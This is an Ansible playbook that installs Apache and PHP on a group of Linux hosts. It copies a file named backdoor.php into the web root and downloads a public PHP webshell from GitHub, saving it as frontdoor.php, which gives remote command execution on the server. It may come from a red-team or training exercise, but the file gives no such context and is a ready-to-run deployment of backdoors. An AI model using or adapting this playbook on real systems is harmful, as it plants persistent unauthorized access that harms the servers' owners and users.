---
- name: Install Apache and Webshell
  hosts: linux
  remote_user: sysadmin
  become: yes

  tasks:
    - name: Install latest version of Apache (Ubuntu)
      apt:
        name: apache2
        state: latest
    
    - name: Copy over backdoor php
      ansible.builtin.copy:
        src: backdoor.php
        dest: /var/www/html/backdoor.php
        owner: root
        group: root
        mode: '644'

    - name: Copy over php webshell
      get_url:
        url: https://raw.githubusercontent.com/WhiteWinterWolf/wwwolf-php-webshell/master/webshell.php
        dest: /var/www/html/frontdoor.php
        mode: '644'
   
    - name: Install PHP (And stuff for Apache) 1.1
      apt:
        name: php
    
    - name: Install PHP (And stuff for Apache) 1.2
      apt:
        name: libapache2-mod-php

    - name: Install PHP (And stuff for Apache) 1.3
      apt:
        name: php-mysql

    - name: Enable PHP
      ansible.builtin.shell: a2enmod php7.4

  handlers:
    - name: restart-apache
      service:
        name: apache2
        state: restarted
...

